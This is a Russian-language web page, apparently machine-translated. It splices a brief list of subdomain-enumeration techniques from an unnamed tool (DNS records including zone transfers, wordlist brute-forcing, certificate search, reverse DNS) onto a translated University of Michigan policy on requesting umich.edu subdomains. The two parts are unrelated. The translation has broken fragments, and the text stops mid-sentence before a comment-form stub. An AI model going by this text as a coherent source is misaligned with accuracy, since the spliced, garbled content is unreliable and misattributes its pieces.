Этот инструмент использует несколько методов для поиска поддоменов, таких как:

  • Записи DNS (NS, MX, TXT, AXFR)
  • Перечисление DNS на основе специально выбранного списка слов
  • Запросы общедоступных поисковых систем
  • Методы изменения слов
  • Поиск в сертификатах SSL
  • Разбор HTML-ссылок
  • Обратный DNS в диапазонах целевых IP-адресов

Запросы доменных имен / Информационно-технологические услуги UM

Мичиганский университет доменных имен

Система доменных имен (DNS) — это интернет-служба, которая переводит доменные имена (например, umich.edu) в IP-адреса (интернет-протокола).

Поскольку доменные имена являются неотъемлемой частью URL-адреса, изменить их после присвоения сложно и дорого. Изменение или повторное назначение установленного доменного имени негативно повлияет на людей, ожидающих найти там оригинальный веб-контент, и нарушит любые существующие ссылки, направляющие пользователей на этот URL-адрес.

В результате для университетского сообщества жизненно важно, чтобы все запросы на доменное имя соответствовали политике U-M DNS. Эта политика помогает гарантировать, что ссылки на веб-сайты UM всегда действительны и логически организованы, а также увеличивает вероятность того, что поддомены UM, которые потребуются в будущем, будут доступны.

Стандарты DNS в домене umich.edu

  • Субдомены первого уровня в домене umich.edu
    • Регенты UM официально признают названия школ, колледжей, институтов и подразделений посредством присвоения организационного кода в Стандартном практическом руководстве университета.
    • Предлагаемое имя должно в целом отражать принятые методы, используемые в Интернете в целом и предоставляемые сайтами по всему миру, включая www и протокол передачи файлов (FTP).Дополнительные сведения о FTP см. в документе FTP для отслеживания данных.
    • Предлагаемое название не должно быть двусмысленным и не может стать двусмысленным, если используется в качестве имени первого уровня без квалификации другого отдела или подразделения (например, psych.umich.edu неоднозначно, так как оно может использоваться психиатрией в Мичиганской медицине или психологии). в ЛСА).
    • Предлагаемое имя не должно часто меняться. Изменения лучше решать на местном уровне (например, coeconference2020.umich.edu будет меняться каждый год).
    • Предлагаемое имя не должно быть зарезервированной записью (например, MX для сервера почтового обмена). Вы будете уведомлены, если это так.
  • Утверждение администратора подразделения: Размещение предложенного имени в качестве поддомена первого уровня в пределах umich.edu должно быть одобрено администратором подразделения школы, колледжа, института или подразделения, с которым будет связано это имя.
  • Исключения для поддоменов первого уровня в пределах umich.Домен edu может быть разрешен в следующих случаях:
    • Предложенное имя будет использоваться многими лицами, представляющими ряд подразделений и/или организаций внутри или за пределами университета (например, plangiving.umich.edu , это сайт, на котором люди могут делать пожертвования университету из своих имущество).
    • Предлагаемое имя является названием службы, а не названием отдела или другой организационной единицы. Например:
      • Запрос от группы, занимающейся несколькими дисциплинами – инженерного колледжа, Мичиганской медицины и LSA.
      • Запрос от группы преподавателей, представляющих разные дисциплины.
    • Предлагаемое название предназначено для общеуниверситетской услуги или функции, характерной для работы учреждения, которую нелегко отождествить с одним отделом или подразделением, или для услуги, которая предлагается в основном людям или группам, не входящим в университет. и которые вряд ли знакомы с деталями внутренней организационной структуры университета (например,г., michiganradio.umich.edu).
    • Предлагаемое название представляет собой инициативу, которая имеет значительную академическую или исследовательскую ценность или общественное влияние, признанную на национальном или международном уровне.
  • Дополнительные рекомендации по предложению доменных имен:
    • Запрос относится к производственной службе, а не к веб-сайту, который будет использоваться только для тестирования или разработки.
    • Запрос на постоянный веб-сайт. Примером временного сайта может быть разовая конференция.
    • Предлагаемое имя отражает назначение запрошенного домена.
    • Предлагаемое имя не является:
      • Часто употребляемое слово как в университете, так и за его пределами.
      • Аббревиатура.
    • Запрос не должен быть направлен на подзонирование существующего исключения (например, добавление «имя» перед «Exception.umich.edu» для создания «name.exception.umich.edu»).
    • Всем исключениям, предоставленным установленному поддомену, будет присвоен псевдоним.Это позволит пользователям определить единицу, к которой относится конкретная служба, даже если связанная единица не отображается в имени исключения.

Подача запроса

Запросы на новый субдомен  (т. е. newname.umich.edu)  должны быть отправлены администратору узла UM, заполнив форму запроса имени домена.

Утверждение запроса обычно занимает около двух недель. Это время требуется хостмастеру UM, чтобы проверить запрос на соответствие Стандартному практическому руководству, а также техническим и университетским руководствам по брендингу, а также сотрудничать с запрашивающими альтернативами, если такой подход становится необходимым.

Стандарты DNS за пределами домена umich.edu

Доменные имена за пределами umich.edu могут быть разрешены и могут потребоваться при соблюдении всех следующих условий:

  1. Предложенное имя будет использоваться многими людьми из разных организаций за пределами университета.
  2. Предложенное название вряд ли можно спутать с названием отдела или подразделения UM.
  3. Предлагаемое название означает организацию или предприятие, коммерческое или некоммерческое, которое явно не является частью университета.
  4. Предлагаемое имя относится либо к первичной, либо к вторичной службе имен, предоставляемой хостами umich.edu, и имеет сервер имен, указанный под именем umich.edu (например, activeu.org, icle.org).
  5. Размещение предлагаемого имени за пределами umich.edu осуществляется с явного одобрения декана или высшего директора школы, колледжа, института или подразделения, с которым в противном случае было бы связано это имя.

Ответственность за реализацию этой политики лежит на группе поддержки DNS в Информационно-технологических службах (ITS).Чтобы связаться с группой поддержки DNS, отправьте электронное письмо по адресу [email protected]

Школы, колледжи и подразделения могут вносить изменения в свои собственные поддомены (например, добавляя «aero» к «engin.

Добавить комментарий

Ваш адрес email не будет опубликован.